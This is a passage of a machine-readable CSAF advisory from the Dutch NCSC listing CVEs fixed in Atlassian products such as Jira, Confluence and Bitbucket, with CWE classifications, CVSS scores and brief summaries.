"contact_details": "cert@ncsc.nl",
"name": "Nationaal Cyber Security Centrum",
"namespace": "https://www.ncsc.nl/"
},
"references": [
{
"category": "external",
"summary": "Reference",
"url": "https://confluence.atlassian.com/security/security-bulletin-january-20-2026-1712324819.html"
}
],
"title": "Kwetsbaarheden verholpen in Atlassian producten",
"tracking": {
"current_release_date": "2026-01-22T09:03:42.667958Z",
"generator": {
"date": "2025-08-04T16:30:00Z",
"engine": {
"name": "V.A.",
"version": "1.3"
}
},
"id": "NCSC-2026-0034",
"initial_release_date": "2026-01-22T09:03:42.667958Z",
"revision_history": [
{
"date": "2026-01-22T09:03:42.667958Z",
"number": "1.0.0",
"summary": "Initiele versie"
}
],
"status": "final",
"version": "1.0.0"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-1"
}
}
],
"category": "product_name",
"name": "Bamboo"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-2"
}
}
],
"category": "product_name",
"name": "Bitbucket"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-3"
}
}
],
"category": "product_name",
"name": "Confluence"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-4"
}
}
],
"category": "product_name",
"name": "Crowd Server"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-5"
}
}
],
"category": "product_name",
"name": "Crucible"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-6"
}
}
],
"category": "product_name",
"name": "Fisheye"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-7"
}
}
],
"category": "product_name",
"name": "Jira"
}
],
"category": "vendor",
"name": "Atlassian"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-3807",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "other",
"text": "Inefficient Regular Expression Complexity",
"title": "CWE-1333"
},
{
"category": "other",
"text": "Incorrect Comparison",
"title": "CWE-697"
},
{
"category": "description",
"text": "Recent updates address critical security vulnerabilities across various software, including Ansible, Node.js, and Golang packages, with significant fixes for ReDoS and sensitive data exposure issues.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2021-3807 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2021/cve-2021-3807.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2021-3807"
},
{
"cve": "CVE-2022-25883",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"notes": [
{
"category": "other",
"text": "Inefficient Regular Expression Complexity",
"title": "CWE-1333"
},
{
"category": "description",
"text": "Multiple versions of the semver package are vulnerable to Regular Expression Denial of Service (ReDoS) through the new Range function, prompting updates in various products to mitigate this risk.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-25883 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2022/cve-2022-25883.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2022-25883"
},
{
"cve": "CVE-2022-45693",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
},
{
"category": "description",
"text": "Multiple Oracle products, including Utilities Application Framework, WebLogic Server, Data Integrator, and Business Intelligence Enterprise Edition, have vulnerabilities allowing unauthenticated denial of service attacks, all with a CVSS score of 7.5.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2022-45693 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2022/cve-2022-45693.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2022-45693"
},
{
"cve": "CVE-2024-21538",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"notes": [
{
"category": "other",
"text": "Inefficient Regular Expression Complexity",
"title": "CWE-1333"
},
{
"category": "description",
"text": "Recent updates across various AWS packages, Node.js versions, and Python libraries address security vulnerabilities, enhance functionality, and improve performance, while several vulnerability reports highlight critical issues in Oracle Communications, HPE Unified OSS Console, and the cross-spawn package.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21538 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-21538.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2024-21538"
},
{
"cve": "CVE-2024-38286",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "description",
"text": "Apache Tomcat versions 11.0.0-M1 to 11.0.0-M20, 10.1.0-M1 to 10.1.24, and 9.0.13 to 9.0.89 are vulnerable to OutOfMemoryError and Denial of Service due to improper TLS handshake handling.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-38286 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-38286.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.6,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2024-38286"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"notes": [
{
"category": "other",
"text": "Inefficient Regular Expression Complexity",
"title": "CWE-1333"
},
{
"category": "description",
"text": "Multiple vulnerabilities in the path-to-regexp library and related components can lead to Denial of Service (DoS) attacks, particularly affecting Node.js applications and IBM App Connect Enterprise due to backtracking regex issues.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-45296 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-45296.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2024-45296"
},
{
"cve": "CVE-2024-45801",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"notes": [
{
"category": "other",
"text": "Inefficient Regular Expression Complexity",
"title": "CWE-1333"
},
{
"category": "other",
"text": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
"title": "CWE-1321"
},
{
"category": "description",
"text": "Multiple vulnerabilities across Oracle products and DOMPurify allow for data compromise, denial of service, and XSS attacks, with CVSS scores ranging from 6.3 to 7.3.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-45801 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-45801.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2024-45801"
},
{
"cve": "CVE-2025-12383",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"notes": [
{
"category": "other",
"text": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
"title": "CWE-362"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Oracle Database Server versions 23.4.0-23.26.0 have a vulnerability in the Fleet Patching and Provisioning component, while Eclipse Jersey versions 2.45, 3.0.16, and 3.1.9 may ignore critical SSL configurations due to a race condition.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-12383 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-12383.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-12383"
},
{
"cve": "CVE-2025-15284",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "description",
"text": "The `qs` module\u0027s `arrayLimit` option is vulnerable to denial-of-service attacks due to its failure to enforce limits for bracket notation, allowing attackers to exploit memory exhaustion.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-15284 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-15284.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-15284"
},
{
"cve": "CVE-2025-27152",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"notes": [
{
"category": "other",
"text": "Server-Side Request Forgery (SSRF)",
"title": "CWE-918"
},
{
"category": "description",
"text": "Recent vulnerabilities in axios, pgadmin4, and HPE software expose systems to SSRF and credential leakage, particularly through the use of absolute URLs, necessitating updates to mitigate these risks.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-27152 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-27152.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-27152"
},
{
"cve": "CVE-2025-41249",
"cwe": {
"id": "CWE-285",
"name": "Improper Authorization"
},
"notes": [
{
"category": "other",
"text": "Improper Authorization",
"title": "CWE-285"
},
{
"category": "other",
"text": "Incorrect Authorization",
"title": "CWE-863"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Multiple vulnerabilities have been identified in Oracle Financial Services and Retail products, as well as the Spring Framework, allowing unauthorized access to sensitive data and potentially leading to information disclosure.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-41249 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-41249.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-41249"
},
{
"cve": "CVE-2025-48976",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "description",
"text": "Multiple denial-of-service vulnerabilities have been identified in Oracle Application Testing Suite, Oracle Agile PLM, Apache Commons FileUpload, and HPE IceWall Identity Manager, with CVSS scores of 7.5 for some products.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-48976 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-48976.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-48976"
},
{
"cve": "CVE-2025-48989",
"cwe": {
"id": "CWE-404",
"name": "Improper Resource Shutdown or Release"
},
"notes": [
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "description",
"text": "Recent updates for Apache Tomcat versions 9, 10, and 11 address the \u0027MadeYouReset\u0027 DoS vulnerability and other issues, with specific versions being susceptible to Denial of Service attacks from malformed client requests.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-48989 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-48989.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-48989"
},
{
"cve": "CVE-2025-49146",
"cwe": {
"id": "CWE-287",
"name": "Improper Authentication"
},
"notes": [
{
"category": "other",
"text": "Improper Authentication",
"title": "CWE-287"
},
{
"category": "description",
"text": "Multiple vulnerabilities in the Oracle Enterprise Data Quality product and PostgreSQL JDBC Driver allow unauthorized access and insecure authentication, with CVSS scores indicating significant risk.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-49146 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-49146.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-49146"
},
{
"cve": "CVE-2025-52434",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"notes": [
{
"category": "other",
"text": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
"title": "CWE-362"
},
{
"category": "description",
"text": "Apache Tomcat versions 9.0.0.M1 to 9.0.106 have multiple vulnerabilities, including a race condition affecting HTTP/2 connections and denial of service flaws, alongside issues in Oracle Graph Server and HPE Unified OSS Console.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-52434 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-52434.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-52434"
},
{
"cve": "CVE-2025-52999",
"cwe": {
"id": "CWE-121",
"name": "Stack-based Buffer Overflow"
},
"notes": [
{
"category": "other",
"text": "Stack-based Buffer Overflow",
"title": "CWE-121"
},
{
"category": "description",
"text": "Multiple vulnerabilities affect Oracle Communications Unified Assurance and Oracle Business Intelligence Enterprise Edition, allowing denial of service attacks, while older jackson-core versions are prone to StackoverflowErrors when parsing nested data.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-52999 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-52999.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-52999"
},
{
"cve": "CVE-2025-53689",
"cwe": {
"id": "CWE-611",
"name": "Improper Restriction of XML External Entity Reference"
},
"notes": [
{
"category": "other",
"text": "Improper Restriction of XML External Entity Reference",
"title": "CWE-611"
},
{
"category": "description",
"text": "Apache Jackrabbit versions prior to 2.23.2 are vulnerable to blind XXE attacks due to an unsecured document build for loading privileges.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:A/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-53689 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-53689.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-53689"
},
{
"cve": "CVE-2025-54988",
"cwe": {
"id": "CWE-611",
"name": "Improper Restriction of XML External Entity Reference"
},
"notes": [
{
"category": "other",
"text": "Improper Restriction of XML External Entity Reference",
"title": "CWE-611"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Apache Tika versions 1.13 to 3.2.1 have a critical XXE vulnerability, while Oracle PeopleSoft\u0027s OpenSearch component in versions 8.60 to 8.62 is also affected by an easily exploitable vulnerability.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-54988 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-54988.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-54988"
},
{
"cve": "CVE-2025-55163",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"notes": [
{
"category": "other",
"text": "Allocation of Resources Without Limits or Throttling",
"title": "CWE-770"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Recent updates to Netty and Oracle Communications products address critical vulnerabilities, including the \u0027MadeYouReset\u0027 attack in HTTP/2, which can lead to denial of service and resource exhaustion.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-55163 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-55163.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-55163"
},
{
"cve": "CVE-2025-55752",
"cwe": {
"id": "CWE-23",
"name": "Relative Path Traversal"
},
"notes": [
{
"category": "other",
"text": "Relative Path Traversal",
"title": "CWE-23"
},
{
"category": "other",
"text": "CWE-1035",
